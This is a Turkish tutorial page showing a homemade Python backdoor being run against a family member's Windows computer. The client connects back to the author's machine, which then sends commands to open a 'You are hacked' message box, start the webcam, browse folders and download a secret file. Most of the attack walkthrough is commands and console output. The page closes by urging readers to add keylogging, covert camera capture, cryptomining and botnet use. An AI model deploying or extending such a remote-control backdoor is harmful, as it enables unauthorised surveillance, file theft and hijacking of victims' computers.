> For the complete documentation index, see [llms.txt](https://bytistan.gitbook.io/baytistan/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://bytistan.gitbook.io/baytistan/arka-kapi/gercek-hayatta-backdoor-testi-yasal-ve-etik-kapsamda.md).

# Gerçek Hayatta Backdoor Testi (Yasal ve Etik Kapsamda)

Normalde bu program buffer overflow denilen bir yönetim ile hedef bilgisayara yüklenir ama şuan ben ona giremeceğim, çünkü yazı gerçekten çok uzun oldu.&#x20;

Abimin bilgisayarında `client.py` dosyasını çalıştırıp programın özelliklerinin çalışıp çalışmadığını deneyeceğim.

## Programın Başlatılması

Kendi bilgisayarımda çalıştırdığım gibi önce sunucuyu kendi bilgisayarımda sonra istemciyi karşı bilgisayarda çalıştıyorum.

### Linux - Kontrol Bilgisayarı

```bash
python3 server.py
```

### Windows - Kurban Bilgisayar

Yapmanız gereken komut satırını açmanız, programın bulunduğu dizine gitmeniz ve ardından aşağıdaki komut satırnı çalıştırmanız.

```bash
python client.py
```

Eğer yanlış bir şey yapmadıysanız programın çalışması ve sizden çıktı beklemesi gerek. Aşağıdakine benzer bir görüntü olması lazım.

```bash
dogukan@train:~/Develop/backdoor$ python3 server.py 
[+] Connection from: ('192.168.1.104', 57099)
 -> 
```

## Senaryo 1 : Kurbanı Korkutmak :)

Tabiki kurbanın bilgisayarına arka kapı attığım zaman onun da haberinin olması için bir tane message box açmam gerek :) Şimdi bir kaç satır kod çalıştıralım ve çıktısını karşı bilgisayardan izleyelim.

```bash
dogukan@train:~/Develop/backdoor$ python3 server.py 
[+] Connection from: ('192.168.1.104', 57099)
 -> cmd /c msg * "You are hacked"
```

Windows'da mesaj kutusu açmak için `msg * "You are hacked"` .

{% hint style="danger" %}
`subprocess` kütüphanesi ile çalışan komutların başına `cmd /c` yazılmalıdır; çünkü bu, komutların Windows komut istemcisi üzerinde çalıştırılacağını belirtmek için gereklidir.
{% endhint %}

<figure><img src="https://2808450955-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHz9Lmz2OPLEITpBob1Vt%2Fuploads%2FWFfuuHQahrXopNXAv4f0%2Fmessage.jpeg?alt=media&amp;token=7a884313-1966-4bca-a60f-835f447869db" alt=""><figcaption><p>1.0</p></figcaption></figure>

Tamam ama bu yeterli değil kamerasını da açmam gerek :)

```bash
# ...

 -> cmd /c start microsoft.windows.camera:
[INFO] Command run.

# ...
```

Bu komut'u açıklamama gerek yok sanırsam kamerayı başlatıyor.

<figure><img src="https://2808450955-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHz9Lmz2OPLEITpBob1Vt%2Fuploads%2F9mjnqoXeERZNBU8YtiMm%2Fcam.jpeg?alt=media&amp;token=f6627b5c-a0f9-4aac-a762-a53ca610c304" alt=""><figcaption><p>1.1</p></figcaption></figure>

Tamam şuan rahatladım şimdilik çıkabilirim.

***

## Senaryo 2 : Çok Gizli Bilgiyi Ele Geçirmek

Bir siber güvenlik uzmanı için tabiki de amaç kurbanı korkutmak değil. Bunun yerine hasas öneme sahip bilgileri ele geçirmek daha önemli.

<figure><img src="https://2808450955-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHz9Lmz2OPLEITpBob1Vt%2Fuploads%2FfL4WQbCgXOiV8xt5GbDX%2Fsecret%201.png?alt=media&amp;token=9c4d5d33-55bc-4ece-9abb-50c8cf7ce62d" alt=""><figcaption><p>1.2</p></figcaption></figure>

Eğer masaüstüne dikkatlice bakarsanız `secret.txt` adında bir dosya olduğunu göreceksiniz. Hedefimiz o dosyanın içerisindeki gizli bilgileri ele geçirmek.&#x20;

{% hint style="info" %}
Yeni senaryo için programı yeniden başlattım.
{% endhint %}

```bash
dogukan@train:~/Develop/backdoor$ python3 server.py 
[+] Connection from: ('192.168.1.104', 57087)
 -> cmd /c dir      
 Volume in drive C has no label.
 Volume Serial Number is 281C-CBB1

 Directory of C:\Users\user\Desktop\backdoor

25.09.2024  11:18    <DIR>          .
25.09.2024  11:18    <DIR>          ..
25.09.2024  12:07             1.376 client.py
25.09.2024  12:05               687 file_transfer.py
25.09.2024  11:17             1.275 server.py
25.09.2024  12:06    <DIR>          __pycache__
               3 File(s)          3.338 bytes
               3 Dir(s)  194.135.486.464 bytes free
```

Öncelikle windows da bulunduğum dizini içerisindekiler ile beraber gösteren `dir` komutunu kullanıyorum. `C:\Users\user\Desktop\backdoor` bu dizinde olduğumu söylüyor.

```bash
 -> cd ..
[INFO] Direction succesfuly changed.
```

Dosya masaüstünde o yüzden bir dizin yukarı çıkıyorum.

```bash
 -> cmd /c dir 
 Volume in drive C has no label.
 Volume Serial Number is 281C-CBB1

 Directory of C:\Users\user\Desktop

25.09.2024  12:10    <DIR>          .
25.09.2024  12:10    <DIR>          ..
25.09.2024  11:18    <DIR>          backdoor
25.09.2024  11:50    <DIR>          data
25.09.2024  12:09                 7 secret.txt
               1 File(s)              7 bytes
               4 Dir(s)  194.134.646.784 bytes free
```

Tekrar bulunduğum dizini kontrol ediyorum. Sonunda hedef dosyamız `secret.txt` ile aynı dizindeyim.

```bash
 -> download secret.txt
[INFO] secret.txt file successfully downlaod
```

İndirme işlemini başlatıyorum.

```bash
dogukan@train:~/Develop/backdoor$ cat secret.txt 
domates
```

Programı sonlandırıp dosyanın içerisinde ne yazıyor diye bakıyorum :)

## Genel Bakış

Eğer buraya kadar başarıyla geldiysen iyi :) Devam etmek istersen şu geliştirme fikirlerini uygulayabilirsin :&#x20;

* Tuş vuruşlarını alma ve kaydetme.
* Fare kontrol etme.
* Kameradan video ve fotoğraf çekme.
* Bilgisayar üzerinden coin kazıma.
* Zombi bilgisayar olarak kullanma.

Bunlardan bir tanesini dahi yapsan kafi, kendini geliştirmeyi sakın bırakma.
